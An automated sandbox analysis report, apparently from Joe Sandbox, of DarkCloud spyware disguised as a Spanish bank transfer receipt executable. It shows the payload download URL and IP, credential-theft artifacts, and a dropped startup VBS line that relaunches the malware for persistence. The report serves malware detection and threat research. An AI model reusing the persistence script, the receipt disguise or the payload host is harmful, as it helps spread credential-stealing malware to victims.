                    Source: Yara matchFile source: 7.2.InstallUtil.exe.750000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3552, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected DarkCloud
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.750000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3552, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts1
                    Windows Management Instrumentation                    		111
                    Scripting                    		11
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		21
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		31
                    Virtualization/Sandbox Evasion                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Software Packing                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials12
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Comprobante transferencia 5678373888272653688262553.exe35%VirustotalBrowse
                    Comprobante transferencia 5678373888272653688262553.exe35%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\IsClosed.exe35%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://alcomax.com.co0%Avira URL Cloudsafe
                    https://alcomax.com.co/Ilmseyropc.mp40%Avira URL Cloudsafe
                    https://alcomax.com.co/Ilmseyropc.mp419dEtOCOgUB/OTYL7rs/pDQ==0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    alcomax.com.co
                    		204.44.192.90
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://alcomax.com.co/Ilmseyropc.mp4false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netComprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netiComprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJComprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://alcomax.com.coComprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.microsoftComprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2114998895.00000000060F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameComprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/11564914/23354;Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/2152978/23354Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://alcomax.com.co/Ilmseyropc.mp419dEtOCOgUB/OTYL7rs/pDQ==Comprobante transferencia 5678373888272653688262553.exe, IsClosed.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      204.44.192.90
                                      		alcomax.com.coCanada
                                      		8100ASN-QUADRANET-GLOBALUSfalse

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1618862
                                      Start date and time:2025-02-19 08:56:03 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 26s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Comprobante transferencia 5678373888272653688262553.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@9/5@1/1
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 77%
                                      • Number of executed functions: 86
                                      • Number of non-executed functions: 7
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Comprobante transferencia 5678373888272653688262553.exe, PID 4956 because it is empty
                                      • Execution Graph export aborted for target IsClosed.exe, PID 7120 because it is empty
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      02:56:54API Interceptor11x Sleep call for process: Comprobante transferencia 5678373888272653688262553.exe modified
                                      02:57:08API Interceptor9x Sleep call for process: IsClosed.exe modified
                                      08:56:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ASN-QUADRANET-GLOBALUSplay.wav.htmGet hashmaliciousHtmlDropperBrowse
                                      • 185.174.100.76
                                      Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                      • 45.199.228.244
                                      garm6.elfGet hashmaliciousUnknownBrowse
                                      • 103.214.71.8
                                      telnet.x86.elfGet hashmaliciousUnknownBrowse
                                      • 104.247.172.105
                                      2025_Simplified_Tips_to_Stay_on_Track.pdfGet hashmaliciousHTMLPhisherBrowse
                                      • 66.63.187.37
                                      https://maiiswim.com/m5b0Get hashmaliciousUnknownBrowse
                                      • 66.63.187.216
                                      .Sx86_64.elfGet hashmaliciousUnknownBrowse
                                      • 103.214.71.8
                                      .Sx86.elfGet hashmaliciousUnknownBrowse
                                      • 103.214.71.8
                                      https://techstarautomotive.com/nblxGet hashmaliciousUnknownBrowse
                                      • 66.63.187.216
                                      https://55foundation.com/f8ooGet hashmaliciousHTMLPhisherBrowse
                                      • 66.63.187.216

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0e#U56fe#U7247_20250218.exeGet hashmaliciousNitolBrowse
                                      • 204.44.192.90
                                      #U56fe#U7247_20250218.exeGet hashmaliciousNitolBrowse
                                      • 204.44.192.90
                                      KrustyPaperjre.pdf.lnk (2).download.lnkGet hashmaliciousEmmenhtal LoaderBrowse
                                      • 204.44.192.90
                                      KrustyPaperjre.pdf.lnk (3).download.lnkGet hashmaliciousEmmenhtal LoaderBrowse
                                      • 204.44.192.90
                                      Ziraat_Bankasi_Swift_Messaji.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 204.44.192.90
                                      PEDIDO 110225-00026_2B63E944DF1243DC82A8AD84AAB0A6DC.PDF(91KB).COM.exeGet hashmaliciousQuasarBrowse
                                      • 204.44.192.90
                                      208430284250.BL.INV.EAWB.050.20240814.174354.20240814.174426.792025_docxpdf.vbsGet hashmaliciousFormBookBrowse
                                      • 204.44.192.90
                                      REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 204.44.192.90
                                      1111.txt.ps1Get hashmaliciousUnknownBrowse
                                      • 204.44.192.90
                                      77954-668716095406000-20240826160944.pdf.jsGet hashmaliciousRemcosBrowse
                                      • 204.44.192.90

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Roaming\IsClosed.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2084352
                                      Entropy (8bit):5.751734832631786
                                      Encrypted:false
                                      SSDEEP:24576:hHywsEIr9Jini1zkbJbDoot6G5c2U+P2nan5VivRx6/dMp+HpUwPY:1ywJSolbJ6B+b6SVxJUw
                                      MD5:365DBE320E1CAD52761BE88C423D63B3
                                      SHA1:836C6B3C078772AF24CBDC32F99BD0AB851180AF
                                      SHA-256:E51878878BC2C25AF3ED62928903B952F576D687BE143F7D2A5CF85F7F0AA6B6
                                      SHA-512:7C6BE616159372563FE08CCB29CEABD692669C443F7B51E9BE0EC1113E8F6E291F86FCA06DB77616429026FF334E6223109EE28680BBA2D32E1156B70AE695D1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 35%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g............................n.... .... ...@.. .......................@ ...........`................................. ...K..... ...................... ...................................................... ............... ..H............text...t.... ...................... ..`.rsrc......... .....................@..@.reloc....... .....................@..B................P.......H.......H...lR...........................................................*...(....*..0..b....... ........8........E....B.......8=...(....(....r...p(....rM..p(.... ....~....{....:....& ....8....*..&~.......*...~....*..0..o....... ........8........E............M...)..._...................8....8U... ....~....{....:....& ....8....8.... ....~....{....:....& ....8.......<.... ....8x.... ....~....{....9c...& ....8X....... ....~....{....9....& ....8........E........?...........U.....

                                      C:\Users\user\AppData\Roaming\IsClosed.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs

                                      Download File
                                      Process:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):84
                                      Entropy (8bit):4.780909727108627
                                      Encrypted:false
                                      SSDEEP:3:FER/n0eFHHoUkh4EaKC5lCIn:FER/lFHI9aZ5EI
                                      MD5:F48A7063A56D5EE34F5C85639E5206A3
                                      SHA1:CD4B1C7575D5CF404524B15C2606CCC5D46EF0B6
                                      SHA-256:533EEC8FCAD856A8F0E1A1CBA2DF2B5C53D3670980C4D34E290839BF7A7EF2E2
                                      SHA-512:1C0D463248D256272B08266712B13AD26146231E4680F94578FC89B233A1E53B31A75D520D620E484A7377C1229A1552DC6F7ACBBE423E4435598D75BB1D84DC
                                      Malicious:true
                                      Reputation:low
                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsClosed.exe"""

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LoginData

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):5.751734832631786
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:Comprobante transferencia 5678373888272653688262553.exe
                                      File size:2'084'352 bytes
                                      MD5:365dbe320e1cad52761be88c423d63b3
                                      SHA1:836c6b3c078772af24cbdc32f99bd0ab851180af
                                      SHA256:e51878878bc2c25af3ed62928903b952f576d687be143f7d2a5cf85f7f0aa6b6
                                      SHA512:7c6be616159372563fe08ccb29ceabd692669c443f7b51e9be0ec1113e8f6e291f86fca06db77616429026ff334e6223109ee28680bba2d32e1156b70ae695d1
                                      SSDEEP:24576:hHywsEIr9Jini1zkbJbDoot6G5c2U+P2nan5VivRx6/dMp+HpUwPY:1ywJSolbJ6B+b6SVxJUw
                                      TLSH:14A55D07BA8A46B1C101273BC4DECC3012AAD5C17632F68A655A575907437B9BBFEE0F
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................n.... .... ...@.. .......................@ ...........`................................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x5fe36e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x67B4D4A7 [Tue Feb 18 18:42:47 2025 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1fe3200x4b.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2000000x5b8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2020000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
